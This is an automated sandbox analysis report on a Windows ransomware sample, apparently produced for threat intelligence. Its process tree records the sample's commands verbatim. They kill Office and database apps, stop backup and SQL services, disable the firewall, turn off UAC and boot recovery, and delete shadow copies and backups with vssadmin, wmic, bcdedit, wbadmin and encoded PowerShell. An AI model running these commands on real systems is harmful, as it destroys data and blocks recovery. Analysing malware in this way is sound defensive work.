Analysis
-
max time kernel
110s -
max time network
135s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
27-07-2021 17:10
Static task
static1
Behavioral task
behavioral1
Sample
1069-cc87764d70827118862689d1630efc72547f97aa.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
1069-cc87764d70827118862689d1630efc72547f97aa.exe
Resource
win10v20210410
General
-
Target
1069-cc87764d70827118862689d1630efc72547f97aa.exe
-
Size
3.2MB
-
MD5
f17e50158a1faf71deb3a6e8b4f3271f
-
SHA1
cc87764d70827118862689d1630efc72547f97aa
-
SHA256
99a0753cba25425651e42ff7673506aa4090a03d8398f702e41d80ca5c2b212e
-
SHA512
e60404ec7d526dd522ca6347c1fbc87f9783b0c0fa31ca4b8aaa656718a8ceaaf26ec8259a31df58ddb0500df8b7a0f63ad7aca652860d50baf4bc66fdd7643b
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process File created C:\Windows\System32\drivers\etc\host 1069-cc87764d70827118862689d1630efc72547f97aa.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\@Adsız@.jpg" 1069-cc87764d70827118862689d1630efc72547f97aa.exe -
Drops file in Windows directory 1 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process File created C:\Windows\Please Read ME!!!.log 1069-cc87764d70827118862689d1630efc72547f97aa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 748 vssadmin.exe 2320 vssadmin.exe 3860 vssadmin.exe 4052 vssadmin.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4260 taskkill.exe 4200 taskkill.exe 4808 taskkill.exe 3508 taskkill.exe 4552 taskkill.exe 4248 taskkill.exe 4912 taskkill.exe 2456 taskkill.exe 4240 taskkill.exe 1968 taskkill.exe 3548 taskkill.exe 680 taskkill.exe 4680 taskkill.exe 4996 taskkill.exe -
Modifies Control Panel 2 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\desktop 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\TileWallpaper = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2488 powershell.exe 2488 powershell.exe 2488 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exevssvc.exetaskkill.exeWMIC.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 680 taskkill.exe Token: SeBackupPrivilege 4140 vssvc.exe Token: SeRestorePrivilege 4140 vssvc.exe Token: SeAuditPrivilege 4140 vssvc.exe Token: SeDebugPrivilege 4200 taskkill.exe Token: SeIncreaseQuotaPrivilege 4300 WMIC.exe Token: SeSecurityPrivilege 4300 WMIC.exe Token: SeTakeOwnershipPrivilege 4300 WMIC.exe Token: SeLoadDriverPrivilege 4300 WMIC.exe Token: SeSystemProfilePrivilege 4300 WMIC.exe Token: SeSystemtimePrivilege 4300 WMIC.exe Token: SeProfSingleProcessPrivilege 4300 WMIC.exe Token: SeIncBasePriorityPrivilege 4300 WMIC.exe Token: SeCreatePagefilePrivilege 4300 WMIC.exe Token: SeBackupPrivilege 4300 WMIC.exe Token: SeRestorePrivilege 4300 WMIC.exe Token: SeShutdownPrivilege 4300 WMIC.exe Token: SeDebugPrivilege 4300 WMIC.exe Token: SeSystemEnvironmentPrivilege 4300 WMIC.exe Token: SeRemoteShutdownPrivilege 4300 WMIC.exe Token: SeUndockPrivilege 4300 WMIC.exe Token: SeManageVolumePrivilege 4300 WMIC.exe Token: 33 4300 WMIC.exe Token: 34 4300 WMIC.exe Token: 35 4300 WMIC.exe Token: 36 4300 WMIC.exe Token: SeDebugPrivilege 2488 powershell.exe Token: SeIncreaseQuotaPrivilege 4348 WMIC.exe Token: SeSecurityPrivilege 4348 WMIC.exe Token: SeTakeOwnershipPrivilege 4348 WMIC.exe Token: SeLoadDriverPrivilege 4348 WMIC.exe Token: SeSystemProfilePrivilege 4348 WMIC.exe Token: SeSystemtimePrivilege 4348 WMIC.exe Token: SeProfSingleProcessPrivilege 4348 WMIC.exe Token: SeIncBasePriorityPrivilege 4348 WMIC.exe Token: SeCreatePagefilePrivilege 4348 WMIC.exe Token: SeBackupPrivilege 4348 WMIC.exe Token: SeRestorePrivilege 4348 WMIC.exe Token: SeShutdownPrivilege 4348 WMIC.exe Token: SeDebugPrivilege 4348 WMIC.exe Token: SeSystemEnvironmentPrivilege 4348 WMIC.exe Token: SeRemoteShutdownPrivilege 4348 WMIC.exe Token: SeUndockPrivilege 4348 WMIC.exe Token: SeManageVolumePrivilege 4348 WMIC.exe Token: 33 4348 WMIC.exe Token: 34 4348 WMIC.exe Token: 35 4348 WMIC.exe Token: 36 4348 WMIC.exe Token: SeIncreaseQuotaPrivilege 4300 WMIC.exe Token: SeSecurityPrivilege 4300 WMIC.exe Token: SeTakeOwnershipPrivilege 4300 WMIC.exe Token: SeLoadDriverPrivilege 4300 WMIC.exe Token: SeSystemProfilePrivilege 4300 WMIC.exe Token: SeSystemtimePrivilege 4300 WMIC.exe Token: SeProfSingleProcessPrivilege 4300 WMIC.exe Token: SeIncBasePriorityPrivilege 4300 WMIC.exe Token: SeCreatePagefilePrivilege 4300 WMIC.exe Token: SeBackupPrivilege 4300 WMIC.exe Token: SeRestorePrivilege 4300 WMIC.exe Token: SeShutdownPrivilege 4300 WMIC.exe Token: SeDebugPrivilege 4300 WMIC.exe Token: SeSystemEnvironmentPrivilege 4300 WMIC.exe Token: SeRemoteShutdownPrivilege 4300 WMIC.exe Token: SeUndockPrivilege 4300 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
NOTEPAD.EXEpid process 4304 NOTEPAD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.execmd.execmd.execmd.execmd.exenet.execmd.execmd.execmd.execmd.exenet.exedescription pid process target process PID 2184 wrote to memory of 1536 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 1536 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 1536 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2172 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2172 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2172 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2344 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2344 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2344 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2472 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2472 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2472 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2804 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2804 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2804 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2912 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2912 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 2912 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 3672 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 3672 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 3672 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 3764 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 3764 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2184 wrote to memory of 3764 2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe cmd.exe PID 2172 wrote to memory of 3684 2172 cmd.exe net.exe PID 2172 wrote to memory of 3684 2172 cmd.exe net.exe PID 2172 wrote to memory of 3684 2172 cmd.exe net.exe PID 2472 wrote to memory of 748 2472 cmd.exe vssadmin.exe PID 2472 wrote to memory of 748 2472 cmd.exe vssadmin.exe PID 2472 wrote to memory of 748 2472 cmd.exe vssadmin.exe PID 1536 wrote to memory of 680 1536 cmd.exe taskkill.exe PID 1536 wrote to memory of 680 1536 cmd.exe taskkill.exe PID 1536 wrote to memory of 680 1536 cmd.exe taskkill.exe PID 2804 wrote to memory of 2320 2804 cmd.exe vssadmin.exe PID 2804 wrote to memory of 2320 2804 cmd.exe vssadmin.exe PID 2804 wrote to memory of 2320 2804 cmd.exe vssadmin.exe PID 3684 wrote to memory of 1568 3684 net.exe net1.exe PID 3684 wrote to memory of 1568 3684 net.exe net1.exe PID 3684 wrote to memory of 1568 3684 net.exe net1.exe PID 3672 wrote to memory of 3860 3672 cmd.exe vssadmin.exe PID 3672 wrote to memory of 3860 3672 cmd.exe vssadmin.exe PID 3672 wrote to memory of 3860 3672 cmd.exe vssadmin.exe PID 2344 wrote to memory of 3936 2344 cmd.exe netsh.exe PID 2344 wrote to memory of 3936 2344 cmd.exe netsh.exe PID 2344 wrote to memory of 3936 2344 cmd.exe netsh.exe PID 2912 wrote to memory of 2488 2912 cmd.exe powershell.exe PID 2912 wrote to memory of 2488 2912 cmd.exe powershell.exe PID 2912 wrote to memory of 2488 2912 cmd.exe powershell.exe PID 3764 wrote to memory of 4052 3764 cmd.exe vssadmin.exe PID 3764 wrote to memory of 4052 3764 cmd.exe vssadmin.exe PID 3764 wrote to memory of 4052 3764 cmd.exe vssadmin.exe PID 1536 wrote to memory of 4200 1536 cmd.exe taskkill.exe PID 1536 wrote to memory of 4200 1536 cmd.exe taskkill.exe PID 1536 wrote to memory of 4200 1536 cmd.exe taskkill.exe PID 2172 wrote to memory of 4208 2172 cmd.exe net.exe PID 2172 wrote to memory of 4208 2172 cmd.exe net.exe PID 2172 wrote to memory of 4208 2172 cmd.exe net.exe PID 4208 wrote to memory of 4236 4208 net.exe net1.exe PID 4208 wrote to memory of 4236 4208 net.exe net1.exe PID 4208 wrote to memory of 4236 4208 net.exe net1.exe PID 3672 wrote to memory of 4300 3672 cmd.exe WMIC.exe PID 3672 wrote to memory of 4300 3672 cmd.exe WMIC.exe PID 3672 wrote to memory of 4300 3672 cmd.exe WMIC.exe PID 3764 wrote to memory of 4348 3764 cmd.exe WMIC.exe -
System policy modification 1 TTPs 17 IoCs
Processes:
1069-cc87764d70827118862689d1630efc72547f97aa.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\undockwithoutlogon = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "5" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\scforceoption = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" 1069-cc87764d70827118862689d1630efc72547f97aa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 1069-cc87764d70827118862689d1630efc72547f97aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "1" 1069-cc87764d70827118862689d1630efc72547f97aa.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe"C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe"1⤵
- Drops file in Drivers directory
- Checks whether UAC is enabled
- Sets desktop wallpaper using registry
- Drops file in Windows directory
- Modifies Control Panel
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virtualboxvm.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im node.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QBW32.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WBGX.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Teams.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Flow.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop DbxSvc3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleServiceXE3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleServiceXE4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent4⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.43⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop MongoDB3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MongoDB4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup114⤵
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService114⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMontorService3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMontorService4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode disable3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.41⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Please Read ME!!!.log1⤵
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\Please Read ME!!!.logMD5
81051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
memory/680-125-0x0000000000000000-mapping.dmp
-
memory/748-124-0x0000000000000000-mapping.dmp
-
memory/1280-182-0x0000000000000000-mapping.dmp
-
memory/1536-114-0x0000000000000000-mapping.dmp
-
memory/1568-127-0x0000000000000000-mapping.dmp
-
memory/1580-178-0x0000000000000000-mapping.dmp
-
memory/1968-177-0x0000000000000000-mapping.dmp
-
memory/2132-185-0x0000000000000000-mapping.dmp
-
memory/2172-115-0x0000000000000000-mapping.dmp
-
memory/2184-122-0x0000000000840000-0x000000000098A000-memory.dmpFilesize
1.3MB
-
memory/2320-126-0x0000000000000000-mapping.dmp
-
memory/2320-186-0x0000000000000000-mapping.dmp
-
memory/2344-116-0x0000000000000000-mapping.dmp
-
memory/2456-180-0x0000000000000000-mapping.dmp
-
memory/2472-117-0x0000000000000000-mapping.dmp
-
memory/2488-192-0x0000000008AA0000-0x0000000008AA1000-memory.dmpFilesize
4KB
-
memory/2488-154-0x0000000007AB0000-0x0000000007AB1000-memory.dmpFilesize
4KB
-
memory/2488-134-0x0000000000E70000-0x0000000000E71000-memory.dmpFilesize
4KB
-
memory/2488-135-0x0000000006DD0000-0x0000000006DD1000-memory.dmpFilesize
4KB
-
memory/2488-130-0x0000000000000000-mapping.dmp
-
memory/2488-159-0x0000000007D80000-0x0000000007D81000-memory.dmpFilesize
4KB
-
memory/2488-155-0x0000000008000000-0x0000000008001000-memory.dmpFilesize
4KB
-
memory/2488-201-0x0000000000DD3000-0x0000000000DD4000-memory.dmpFilesize
4KB
-
memory/2488-191-0x0000000008B40000-0x0000000008B41000-memory.dmpFilesize
4KB
-
memory/2488-141-0x0000000006BF0000-0x0000000006BF1000-memory.dmpFilesize
4KB
-
memory/2488-142-0x0000000000DD0000-0x0000000000DD1000-memory.dmpFilesize
4KB
-
memory/2488-143-0x0000000000DD2000-0x0000000000DD3000-memory.dmpFilesize
4KB
-
memory/2488-144-0x00000000075E0000-0x00000000075E1000-memory.dmpFilesize
4KB
-
memory/2488-194-0x0000000009380000-0x0000000009381000-memory.dmpFilesize
4KB
-
memory/2488-146-0x0000000007650000-0x0000000007651000-memory.dmpFilesize
4KB
-
memory/2488-193-0x0000000008AF0000-0x0000000008AF1000-memory.dmpFilesize
4KB
-
memory/2488-148-0x00000000076E0000-0x00000000076E1000-memory.dmpFilesize
4KB
-
memory/2804-118-0x0000000000000000-mapping.dmp
-
memory/2912-119-0x0000000000000000-mapping.dmp
-
memory/3460-187-0x0000000000000000-mapping.dmp
-
memory/3508-184-0x0000000000000000-mapping.dmp
-
memory/3548-196-0x0000000000000000-mapping.dmp
-
memory/3672-120-0x0000000000000000-mapping.dmp
-
memory/3684-123-0x0000000000000000-mapping.dmp
-
memory/3764-121-0x0000000000000000-mapping.dmp
-
memory/3860-128-0x0000000000000000-mapping.dmp
-
memory/3936-129-0x0000000000000000-mapping.dmp
-
memory/3948-179-0x0000000000000000-mapping.dmp
-
memory/4052-131-0x0000000000000000-mapping.dmp
-
memory/4100-183-0x0000000000000000-mapping.dmp
-
memory/4200-136-0x0000000000000000-mapping.dmp
-
memory/4208-137-0x0000000000000000-mapping.dmp
-
memory/4224-181-0x0000000000000000-mapping.dmp
-
memory/4236-138-0x0000000000000000-mapping.dmp
-
memory/4240-188-0x0000000000000000-mapping.dmp
-
memory/4248-195-0x0000000000000000-mapping.dmp
-
memory/4260-197-0x0000000000000000-mapping.dmp
-
memory/4300-139-0x0000000000000000-mapping.dmp
-
memory/4348-140-0x0000000000000000-mapping.dmp
-
memory/4416-145-0x0000000000000000-mapping.dmp
-
memory/4452-147-0x0000000000000000-mapping.dmp
-
memory/4520-149-0x0000000000000000-mapping.dmp
-
memory/4552-150-0x0000000000000000-mapping.dmp
-
memory/4564-151-0x0000000000000000-mapping.dmp
-
memory/4612-152-0x0000000000000000-mapping.dmp
-
memory/4632-153-0x0000000000000000-mapping.dmp
-
memory/4680-156-0x0000000000000000-mapping.dmp
-
memory/4712-157-0x0000000000000000-mapping.dmp
-
memory/4736-158-0x0000000000000000-mapping.dmp
-
memory/4768-160-0x0000000000000000-mapping.dmp
-
memory/4788-161-0x0000000000000000-mapping.dmp
-
memory/4808-162-0x0000000000000000-mapping.dmp
-
memory/4840-163-0x0000000000000000-mapping.dmp
-
memory/4860-164-0x0000000000000000-mapping.dmp
-
memory/4884-165-0x0000000000000000-mapping.dmp
-
